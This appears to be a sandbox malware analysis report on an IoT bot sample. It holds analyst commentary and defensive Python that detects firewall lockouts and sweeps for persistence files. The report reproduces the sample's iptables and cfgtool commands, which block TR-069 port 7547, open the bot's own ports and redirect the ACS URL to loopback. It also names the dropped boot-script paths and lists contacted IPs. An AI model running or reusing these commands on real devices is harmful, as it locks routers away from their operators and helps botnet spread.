Source: /bin/sh (PID: 4616) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4650) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4653) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4690) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4716) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
Source: /bin/sh (PID: 4736) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
Source: /bin/sh (PID: 4739) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4748) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4793) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4796) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4805) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4829) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4878) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4906) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4926) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4931) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4947) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4974) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5000) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5021) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5025) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5034) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5057) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5087) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5117) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5120) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5127) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5152) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5182) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5210) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5231) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5234) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT Jump to behavior
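What the rule set above does, read as a whole: every rule is inserted with -I, so it lands ahead of whatever the device already had, and each one is issued twice, once with --destination-port/--source-port and once with the equivalent --dport/--sport spelling. The DROP rules remove inbound and outbound reachability for TCP 7547 (the TR-069 CWMP connection-request port an ISP's ACS uses to reach the CPE) and for TCP 35000, 50023 and 58000; the ACCEPT rules in both the filter and nat tables open UDP 8000 and TCP 54753. Together with the cfgtool commands that point InternetGatewayDevice.ManagementServer URL at http://127.0.0.1 and set a new ConnectionRequestPassword, this cuts the device off from its operator so it cannot be remotely reconfigured or re-flashed, while keeping the bot's own ports open. Note that the stderr capture below shows cfgtool is not present in the sandbox, so that half of the lockout was only attempted here, not observed.

The following is an added detection example written for this report, not code from Joe Sandbox or from the sample: it parses shell command lines of the form shown above, summarises what they do to inbound reachability, extracts the ACS URL rewrite, and flags the combination of a TR-069 port dropped at the head of INPUT with newly opened inbound ports. The input list is constructed from the report's own command strings plus one benign administrator rule.

```python
import re
from urllib.parse import urlparse

# Constructed input: a subset of the "Shell command executed" lines listed above,
# plus one benign administrator rule so there is something for the filter to ignore.
SAMPLE_LINES = [
    '/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \\"http://127.0.0.1\\""',
    '/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"',
    '/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"',
    '/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"',
    '/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"',
    '/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"',
    '/bin/sh -c "iptables -I INPUT -p udp --dport 8000 -j ACCEPT"',
    '/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT"',
    '/bin/sh -c "iptables -I INPUT -p tcp --dport 54753 -j ACCEPT"',
    '/bin/sh -c "iptables -A INPUT -p tcp --dport 22 -j ACCEPT"',
]

# One iptables rule per line: chain, optional table, protocol, a single port match
# (long or short option spelling) and a terminating target.
RULE_RE = re.compile(
    r'iptables\s+-(?P<op>[IA])\s+(?P<chain>\w+)'
    r'(?:\s+-t\s+(?P<table>\w+))?'
    r'\s+-p\s+(?P<proto>tcp|udp)'
    r'\s+--(?:dport|destination-port|sport|source-port)\s+(?P<port>\d+)'
    r'\s+-j\s+(?P<target>ACCEPT|DROP|REJECT)'
)
# The TR-069 ACS URL rewrite; the shell-escaped quotes around the URL are optional.
ACS_RE = re.compile(r'ManagementServer\s+URL\s+\\?"?(?P<url>[^"\\\s]+)')

def parse_rule(line):
    """Return a dict describing an iptables rule line, or None if the line is not one."""
    m = RULE_RE.search(line)
    if not m:
        return None
    r = m.groupdict()
    r['table'] = r['table'] or 'filter'
    r['port'] = int(r['port'])
    r['prepended'] = r.pop('op') == 'I'   # -I puts the rule ahead of existing ones
    return r

def summarize(lines):
    """Map (table, chain, proto, port) -> target for every parsable rule."""
    out = {}
    for line in lines:
        r = parse_rule(line)
        if r:
            out[(r['table'], r['chain'], r['proto'], r['port'])] = r['target']
    return out

def acs_url(lines):
    """Return the ACS URL the commands try to configure, or None."""
    for line in lines:
        m = ACS_RE.search(line)
        if m:
            return m.group('url')
    return None

def firewall_indicators(lines):
    """Summarise the effect on inbound reachability and flag the lockout pattern."""
    s = summarize(lines)
    blocked = sorted({p for (_, chain, _, p), t in s.items()
                      if chain == 'INPUT' and t in ('DROP', 'REJECT')})
    opened = sorted({(pr, p) for (_, chain, pr, p), t in s.items()
                     if chain == 'INPUT' and t == 'ACCEPT'})
    url = acs_url(lines)
    host = urlparse(url).hostname if url else None
    loopback = host is not None and (host == 'localhost' or host.startswith('127.'))
    return {
        'blocked_inbound': blocked,
        'opened_inbound': opened,
        'tr069_blocked': 7547 in blocked,       # TCP 7547 is the TR-069 CWMP connection-request port
        'acs_url': url,
        'acs_points_to_loopback': loopback,
        # Management port dropped while new inbound ports are opened: the device is
        # being taken away from its operator, not hardened.
        'suspicious': 7547 in blocked and bool(opened),
    }

if __name__ == '__main__':
    for k, v in firewall_indicators(SAMPLE_LINES).items():
        print(f'{k}: {v}')
```

On a real CPE the same check can be run against `iptables -S INPUT` output rather than a sandbox transcript; a DROP for 7547 that sits above the operator's own ACCEPT, and a ManagementServer URL on a loopback address, are both conditions that should never arise from legitimate provisioning.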
Reads system information from the proc file system
Source: /tmp/rIbyGX66Op (PID: 4605) Reads from proc file: /proc/stat Jump to behavior
Sample tries to set the executable flag
Source: /tmp/rIbyGX66Op (PID: 4578) File: /usr/networks (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes ELF files to disk
Source: /tmp/rIbyGX66Op (PID: 4578) File written: /usr/networks Jump to dropped file
Writes shell script files to disk
Source: /tmp/rIbyGX66Op (PID: 4578) Shell script file created: /etc/rcS.d/S95baby.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) Shell script file created: /etc/init.d/S95baby.sh Jump to dropped file
Source: submitted sample Stderr:
telnetd: no process found
utelnetd: no process found
scfgmgr: no process found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
/bin/sh: 1: cfgtool: not found
/bin/sh: 1: cfgtool: not found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
exit code = 0
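The persistence artifacts above are concrete enough to sweep for on a suspected device: the dropped ELF at /usr/networks and the boot script S95baby.sh written to both /etc/rcS.d and /etc/init.d, all with mode bits owner r-x, group r-x, other rwx. The other-writable bit is itself a finding, since a boot script any local user can edit is a foothold regardless of what it currently contains. The remaining /etc/init.d entries in the "Drops files in suspicious directories" list further down (mountall.sh, hwclock.sh, hostname.sh and so on) carry standard Debian initscript names, so a sweep should key on the specific names, the /usr/networks path and the permission bits rather than on the directory alone.

The following is an added host-sweep example written for this report, not code from Joe Sandbox or from the sample. It walks the rc directories under a given root, reports the exact paths from the report, any world-writable rc script, and any script whose contents reference the dropped binary. The fixture it builds is constructed: the report shows only the paths and mode bits of S95baby.sh, not its contents, so the script body and the placeholder ELF header are hypothetical.

```python
import os
import stat
import tempfile

# Relative paths the report shows the sample writing or making executable.
IOC_PATHS = ('etc/rcS.d/S95baby.sh', 'etc/init.d/S95baby.sh', 'usr/networks')
# Strings to look for inside any rc script: the dropped binary and the script name.
IOC_STRINGS = (b'/usr/networks', b'S95baby')
RC_DIRS = ('etc/init.d', 'etc/rcS.d', 'etc/rc.d')

def sweep(root='/'):
    """Return findings for the filesystem under `root`; paths are relative to it."""
    findings = []
    for rel in IOC_PATHS:
        if os.path.lexists(os.path.join(root, rel)):
            findings.append({'kind': 'ioc_path', 'path': rel})
    for d in RC_DIRS:
        full = os.path.join(root, d)
        if not os.path.isdir(full):
            continue
        for name in sorted(os.listdir(full)):
            f = os.path.join(full, name)
            rel = os.path.join(d, name)
            if not os.path.isfile(f):
                continue
            # An rc script anyone can modify is a persistence foothold whatever it contains.
            if os.stat(f).st_mode & stat.S_IWOTH:
                findings.append({'kind': 'world_writable_rc', 'path': rel})
            with open(f, 'rb') as fh:
                head = fh.read(65536)
            for s in IOC_STRINGS:
                if s in head:
                    findings.append({'kind': 'ioc_string', 'path': rel, 'match': s.decode()})
    return findings

def build_demo_tree(infected=True):
    """Constructed fixture: a throwaway root with (optionally) the report's artifacts."""
    root = tempfile.mkdtemp(prefix='mozi-sweep-')
    for d in ('etc/init.d', 'etc/rcS.d', 'usr'):
        os.makedirs(os.path.join(root, d))
    benign = os.path.join(root, 'etc/init.d/hostname.sh')
    with open(benign, 'w') as fh:
        fh.write('#!/bin/sh\nhostname -F /etc/hostname\n')
    os.chmod(benign, 0o755)
    if infected:
        # Hypothetical script body; the report shows only the path and the mode bits
        # (owner r-x, group r-x, other rwx), not the contents.
        body = '#!/bin/sh\n/usr/networks &\n'
        for rel in ('etc/rcS.d/S95baby.sh', 'etc/init.d/S95baby.sh'):
            p = os.path.join(root, rel)
            with open(p, 'w') as fh:
                fh.write(body)
            os.chmod(p, 0o557)
        with open(os.path.join(root, 'usr/networks'), 'wb') as fh:
            fh.write(b'\x7fELF')   # placeholder header, not the real dropped binary
    return root

if __name__ == '__main__':
    for hit in sweep(build_demo_tree()):
        print(hit)
```

Run `sweep('/')` on a mounted firmware image or a live device; on an embedded target without Python the same three checks (path exists, `find /etc/init.d /etc/rcS.d -perm -o+w`, `grep -l /usr/networks`) can be typed into BusyBox sh.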

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/S95baby.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountall.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/checkfs.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/umountnfs.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountkernfs.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/checkroot-bootclean.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountnfs-bootclean.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/bootmisc.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/checkroot.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/hwclock.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/hostname.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountdevsubfs.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountall-bootclean.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountnfs.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /usr/bin/gettext.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /usr/sbin/alsa-info.sh Jump to dropped file
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 47738 -> 8443

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/rIbyGX66Op (PID: 4559) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4601) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/modprobe (PID: 4622) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5310) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5335) Queries kernel information via 'uname': Jump to behavior
Source: kvm-test-1-run.sh.8.dr Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: functions.sh0.8.dr Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: kvm-test-1-run.sh.8.dr Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh0.8.dr Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm.sh.8.dr Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_pid=$!
Source: kvm-test-1-run.sh.8.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.8.dr Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.8.dr Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.8.dr Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh0.8.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: functions.sh0.8.dr Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.8.dr Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: functions.sh0.8.dr Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: functions.sh0.8.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh0.8.dr Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: functions.sh0.8.dr Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm.sh.8.dr Binary or memory string: --qemu-args|--qemu-arg)
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: functions.sh0.8.dr Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: functions.sh0.8.dr Binary or memory string: specify_qemu_cpus () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-ppc64
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.8.dr Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: functions.sh0.8.dr Binary or memory string: qemu-system-ppc64)
Source: functions.sh0.8.dr Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm-recheck-rcu.sh.8.dr Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_append qemu-cmd
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_vcpus () {
Source: functions.sh0.8.dr Binary or memory string: # qemu-args already contains "-smp".
Source: kvm-test-1-run.sh.8.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.8.dr Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: functions.sh0.8.dr Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh0.8.dr Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.8.dr Binary or memory string: --qemu-cmd)
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate qemu -append arguments
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu builddir
Source: functions.sh0.8.dr Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh0.8.dr Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.8.dr Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-i386
Source: functions.sh0.8.dr Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-x86_64
Source: functions.sh0.8.dr Binary or memory string: identify_qemu () {

No Screenshots

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.157.0.194
unknown United Kingdom
8426 CLARANET-ASClaraNETLTDGB false
96.85.17.58
unknown United States
7922 COMCAST-7922US false
27.197.73.200
unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
40.244.52.155
unknown United States
4249 LILLY-ASUS false
118.208.32.220
unknown Australia
7545 TPG-INTERNET-APTPGTelecomLimitedAU false
220.236.199.32
unknown Australia
4804 MPX-ASMicroplexPTYLTDAU false
64.134.176.11
unknown United States
14654 WAYPORTUS false
5.71.245.186
unknown United Kingdom
5607 BSKYB-BROADBAND-ASGB false
13.162.43.135
unknown United States
7018 ATT-INTERNET4US false
97.71.87.134
unknown United States
33363 BHN-33363US false
72.163.148.240
unknown United States
109 CISCOSYSTEMSUS false
39.187.20.227
unknown China
56041 CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC false
175.111.30.198
unknown Korea Republic of
38676 FLEXNET-AS-KRflexnetworksKR false
96.100.50.191
unknown United States
7922 COMCAST-7922US false
119.215.90.101
unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
86.170.164.103
unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
172.143.86.137
unknown United States
7018 ATT-INTERNET4US false
39.241.4.19
unknown Indonesia
23693 TELKOMSEL-ASN-IDPTTelekomunikasiSelularID false
196.164.176.188
unknown South Africa
328065 Vast-Networks-ASZA false
46.14.87.211
unknown Switzerland
3303 SWISSCOMSwisscomSwitzerlandLtdCH false
14.239.14.115
unknown Viet Nam
45899 VNPT-AS-VNVNPTCorpVN false
35.37.134.166
unknown United States
36375 UMICH-AS-5US false
102.44.180.253
unknown Egypt
8452 TE-ASTE-ASEG false
166.201.228.49
unknown United States
20057 ATT-MOBILITY-LLC-AS20057US false
136.26.47.177
unknown United States
19165 WEBPASSUS false
178.82.160.65
unknown Switzerland
6830 LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding false
37.211.3.99
unknown Qatar
42298 GCC-MPLS-PEERINGGCCMPLSpeeringQA false
11.89.47.10
unknown United States
3356 LEVEL3US false
124.12.205.156
unknown Taiwan; Republic of China (ROC)
9924 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi false
5.232.235.2
unknown Iran (ISLAMIC Republic Of)
58224 TCIIR false
217.131.3.242
unknown Turkey
34984 TELLCOM-ASTR false
182.9.38.118
unknown Indonesia
23693 TELKOMSEL-ASN-IDPTTelekomunikasiSelularID false
187.213.209.8
unknown Mexico
8151 UninetSAdeCVMX false
181.113.148.196
unknown Ecuador
28006 CORPORACIONNACIONALDETELECOMUNICACIONES-CNTEPEC false
79.116.36.122
unknown Romania
8708 RCS-RDS73-75DrStaicoviciRO false
157.159.2.178
unknown France
2094 FR-TELECOM-MANAGEMENT-SUDPARISTelecomManagementSudPari false
133.82.183.72
unknown Japan
2907 SINET-ASResearchOrganizationofInformationandSystemsN false
77.187.60.235
unknown Germany
6805 TDDE-ASN1DE false
221.68.20.5
unknown Japan
17676 GIGAINFRASoftbankBBCorpJP false
53.117.221.59
unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
2.164.195.43
unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
68.129.151.18
unknown United States
701 UUNETUS false
108.204.197.113
unknown United States
7018 ATT-INTERNET4US false
95.82.71.140
unknown Kazakhstan
21299 KAR-TEL-ASAlmatyRepublicofKazakhstanKZ false
128.101.242.184
unknown United States
217 UMN-SYSTEMUS false
185.149.161.32
unknown Russian Federation
61131 ZONATELECOM-ASRU false
118.191.184.146
unknown China
59045 SUNHONGSGuangzhounavigationinformationtechnologycoLT false
221.97.226.130
unknown Japan
17676 GIGAINFRASoftbankBBCorpJP false
197.67.5.164
unknown South Africa
16637 MTNNS-ASZA false
203.49.228.158
unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
185.189.120.185
unknown Iran (ISLAMIC Republic Of)
64413 AVAGOSTARIR false
117.177.0.80
unknown China
9808 CMNET-GDGuangdongMobileCommunicationCoLtdCN false
194.207.227.221
unknown United Kingdom
12390 KINGSTON-UK-ASGB false
104.222.233.43
unknown United States
22552 ESITEDUS false
208.150.231.33
unknown United States
3561 CENTURYLINK-LEGACY-SAVVISUS false
162.159.107.38
unknown United States
13335 CLOUDFLARENETUS false
120.123.201.216
unknown Taiwan; Republic of China (ROC)
17716 NTU-TWNationalTaiwanUniversityTW false
87.178.42.105
unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
166.231.171.29
unknown United States
6614 USCC-ASNUS false
113.81.33.205
unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
18.198.126.226
unknown United States
16509 AMAZON-02US false
32.26.172.252
unknown United States
2686 ATGS-MMD-ASUS false
84.234.82.133
unknown Denmark
16095 JAYNETSentiaDanmarkASDK false
64.48.220.97
unknown United States
2828 XO-AS15US false
86.18.93.173
unknown United Kingdom
5089 NTLGB false
163.112.176.81
unknown France
17816 CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovi false
200.161.213.126
unknown Brazil
27699 TELEFONICABRASILSABR false
32.69.172.174
unknown United States
2686 ATGS-MMD-ASUS false
161.141.143.253
unknown Canada
17311 ECMC-BGPUS false
68.87.138.12
unknown United States
7922 COMCAST-7922US false
91.244.32.53
unknown Ukraine
25133 MCLAUT-ASUA false
175.12.222.235
unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
17.103.205.243
unknown United States
714 APPLE-ENGINEERINGUS false
199.247.32.171
unknown United States
396982 GOOGLE-PRIVATE-CLOUDUS false
120.72.175.96
unknown China
24430 CNNIC-CHINAPOST-APCHINASTATEPOSTBUREAUCN false
19.21.98.61
unknown United States
3 MIT-GATEWAYSUS false
134.106.59.104
unknown Germany
680 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese false
107.112.161.192
unknown United States
46164 ATT-MOBILITY-LABSUS false
167.13.97.181
unknown United States
3816 COLOMBIATELECOMUNICACIONESSAESPCO false
4.214.87.116
unknown United States
3356 LEVEL3US false
53.181.254.20
unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
115.24.120.43
unknown China
4538 ERX-CERNET-BKBChinaEducationandResearchNetworkCenter false
79.73.229.27
unknown United Kingdom
